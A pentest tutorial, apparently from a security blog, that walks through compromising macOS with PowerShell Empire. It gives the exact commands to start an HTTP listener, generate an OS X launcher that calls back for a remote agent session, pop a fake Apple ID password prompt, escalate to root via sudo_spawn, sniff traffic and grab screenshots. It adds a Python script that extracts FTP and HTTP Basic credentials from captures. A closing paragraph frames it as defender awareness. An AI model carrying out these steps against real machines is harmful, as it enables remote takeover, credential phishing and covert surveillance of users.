OSX Exploitation with Powershell Empire
This article is another post in the Empire series. In it we walk through OS X (macOS) exploitation and post-exploitation with PowerShell Empire.
Table of Content
Exploiting Mac
Post Exploitation
- Phishing
- Privilege Escalation
- Sniffing
Exploiting Mac
Here I'm assuming you already know the basics of PowerShell Empire, so we go straight to creating the listener with the following commands:
uselistener http
set Host //192.168.1.26
execute
Executing the above commands starts the HTTP listener, as shown in the image above. The next step is to create a stager for OS X. For that, type:
usestager osx/launcher
execute
As you can see in the image above, the stager generates launcher code. Run that code on the target OS X system; once it executes, the agent calls back to the listener and you have your session, as shown in the image below:
Post Exploitation
Phishing
Now that we have a session on the Mac, a few post-exploitation modules can be used to our advantage. The first one is collection/osx/prompt. This module pops up a dialog asking the user to enter their Apple ID password. Note that it is not stealthy: the dialog is plainly visible to the logged-in user, so it relies on the user believing it is a legitimate system prompt.
usemodule collection/osx/prompt
execute
Executing the module opens a password prompt on the target machine, as shown in the image below. Whatever the user types is returned to Empire in clear text, as shown in the image above.
Privilege Escalation
For privilege escalation on OS X we use the module privesc/multi/sudo_spawn. Password is the current user's password (toor in this lab); the module passes it to sudo and spawns a second agent, which calls back to the listener you name. To use the module, type:
usemodule privesc/multi/sudo_spawn
set Listener http
set Password toor
execute
Executing this module gives you a new session with root privileges, as you can see in the image below:
Sniffing
The module we use here is collection/osx/sniffer. It captures all traffic to and from the target system and writes it to a pcap file for offline analysis. To use the module, type:
usemodule collection/osx/sniffer
execute
As you can see in the image below, credentials sent over clear-text protocols (HTTP, FTP and the like) show up in the pcap in plain text. Traffic protected by TLS is captured too, but nothing readable can be recovered from it.
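An added example, not the article's code and not part of the Empire project: a small pure-Python script that walks a libpcap file such as the one the sniffer module produces and pulls out FTP USER/PASS commands and HTTP Basic credentials. To keep it runnable offline, the capture is constructed in code (the hosts, ports and credentials are made up); for real use, pass extract_credentials the bytes of the downloaded pcap.

```python
"""Extract clear-text credentials from a libpcap capture.

Added example (not Empire's code). Sample capture is constructed below.
"""
import base64
import re
import struct

LINKTYPE_ETHERNET = 1
FTP_RE = re.compile(rb"^(USER|PASS) (.+?)\r?$", re.M)
BASIC_RE = re.compile(rb"^Authorization: Basic ([A-Za-z0-9+/=]+)\r?$", re.M | re.I)


def _build_pcap(frames):
    """Wrap raw Ethernet frames in a libpcap file (constructed test data)."""
    header = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    records = b"".join(struct.pack("<IIII", 0, 0, len(f), len(f)) + f for f in frames)
    return header + records


def _tcp_frame(src, dst, sport, dport, payload):
    """Ethernet/IPv4/TCP frame without options; checksums are left as zero."""
    eth = b"\x00" * 12 + b"\x08\x00"
    total_len = 20 + 20 + len(payload)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0, 0, 64, 6, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 65535, 0, 0)
    return eth + ip + tcp + payload


def iter_tcp_payloads(pcap_bytes):
    """Yield (src, dst, sport, dport, payload) for every TCP segment in the file."""
    magic, = struct.unpack("<I", pcap_bytes[:4])
    endian = "<" if magic in (0xA1B2C3D4, 0xA1B23C4D) else ">"
    linktype, = struct.unpack(endian + "I", pcap_bytes[20:24])
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet captures are handled here")
    off = 24
    while off + 16 <= len(pcap_bytes):
        _, _, incl_len, _ = struct.unpack(endian + "IIII", pcap_bytes[off:off + 16])
        frame = pcap_bytes[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":
            continue  # not IPv4
        ihl = (frame[14] & 0x0F) * 4
        if frame[23] != 6:
            continue  # not TCP
        src = ".".join(map(str, frame[26:30]))
        dst = ".".join(map(str, frame[30:34]))
        tcp = frame[14 + ihl:]
        if len(tcp) < 20:
            continue
        sport, dport = struct.unpack("!HH", tcp[:4])
        data_off = (tcp[12] >> 4) * 4
        yield src, dst, sport, dport, tcp[data_off:]


def extract_credentials(pcap_bytes):
    """Return a list of (protocol, flow, secret) tuples found in clear-text traffic."""
    found = []
    for src, dst, sport, dport, payload in iter_tcp_payloads(pcap_bytes):
        flow = f"{src}:{sport}->{dst}:{dport}"
        for cmd, arg in FTP_RE.findall(payload):
            found.append(("ftp", flow, f"{cmd.decode()} {arg.decode()}"))
        for token in BASIC_RE.findall(payload):
            try:
                creds = base64.b64decode(token, validate=True).decode("utf-8")
            except (ValueError, UnicodeDecodeError):
                continue  # malformed header, not a credential
            found.append(("http-basic", flow, creds))
    return found


# Constructed capture: an FTP login, an HTTP Basic request, and one TLS record.
SAMPLE_PCAP = _build_pcap([
    _tcp_frame("192.168.1.50", "192.168.1.10", 51000, 21, b"USER alice\r\n"),
    _tcp_frame("192.168.1.50", "192.168.1.10", 51000, 21, b"PASS S3cret!\r\n"),
    _tcp_frame("192.168.1.50", "192.168.1.20", 51001, 80,
               b"GET /admin HTTP/1.1\r\nHost: intranet\r\nAuthorization: Basic "
               + base64.b64encode(b"bob:hunter2") + b"\r\n\r\n"),
    # TLS application-data record (opaque bytes): captured, but nothing readable.
    _tcp_frame("192.168.1.50", "93.184.216.34", 51002, 443,
               b"\x17\x03\x03\x00\x20" + bytes(range(32))),
])

if __name__ == "__main__":
    for proto, flow, secret in extract_credentials(SAMPLE_PCAP):
        print(f"{proto:10s} {flow:40s} {secret}")
```

Only the FTP and HTTP flows yield anything; the port 443 segment is parsed like the others but produces no findings, which is the practical limit of the sniffer module against modern, mostly encrypted traffic.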
Another post module takes a screenshot of the target's desktop. To use it, type:
usemodule collection/osx/screenshot
execute
The module captures the screen and returns the image, as shown below:
Empire ships a number of further OS X post modules that you can explore and experiment with, as shown in the image below:
This article on OS X exploitation with PowerShell Empire shows how an attacker who has landed an Empire agent on a Mac can use the phishing, privilege escalation, sniffing and screenshot modules to harvest credentials and take full control of the machine. Understanding these techniques helps defenders recognise the artifacts they leave behind (unexpected password dialogs, sudo use from a user process, promiscuous-mode captures) and detect and mitigate them.
To learn more about PowerShell, follow this link.
Author: Sanjeet Kumar is an Information Security Analyst, Pentester and Researcher. Contact Here